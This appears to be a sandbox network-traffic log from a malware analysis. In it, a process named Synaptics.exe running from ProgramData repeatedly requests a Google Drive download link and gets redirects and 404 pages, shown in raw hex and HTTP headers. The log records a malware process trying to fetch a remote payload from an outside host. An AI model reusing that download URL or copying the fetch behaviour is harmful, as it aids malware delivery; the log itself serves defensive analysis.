                                                                                                                                                      2024-12-30 10:25:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 37 4a 56 76 41 37 36 73 74 58 65 78 34 32 65 68 43 4b 56 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="s7JVvA76stXex42ehCKVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      22192.168.2.1149847172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yPWsjUADV5KnXQfrEcT6DQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      23192.168.2.1149848142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7kgc9wJ9U2CL61VRVan6sB3ulNEmlb1V0LsEdY_12fOLR3goH7TxYzqaxis1KdesDVZg_Rsks
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xrzBVyYDrSGlJ749Z-dM7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 70 67 58 48 61 43 49 72 63 66 4f 77 48 4f 6a 4e 2d 2d 49 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="9pgXHaCIrcfOwHOjN--IWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      24192.168.2.1149857172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-c3MSzMbf-N3WkV1Y6OOAnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      25192.168.2.1149858142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:37 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Svs1IQ44jLrISH8rJb7s8T4SlZWS-R13PXjaDXoCTOyaagM4RiCqx_muH0LCereMy
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-T-slwck-Ot-b1gTI18XrUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 4f 37 51 53 50 63 6b 48 6b 4c 41 4a 74 36 52 77 46 45 5a 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="TO7QSPckHkLAJt6RwFEZuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      26192.168.2.1149859172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wr2PSSVOFgWULq3GWWHNjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      27192.168.2.1149860142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:37 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Bb3yM0F_BDOWSWHoUUjLfu9CJc5F4JIuIh4s1rr5LP0qgyB5hNw88zrYY3RxDOD8Yx45XDzQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wMNjJcf-m0qZ0W7xeAzIiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 69 35 4f 50 47 66 74 33 6e 6c 4c 38 46 53 66 2d 6b 43 72 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="_i5OPGft3nlL8FSf-kCrhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      28192.168.2.1149878172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
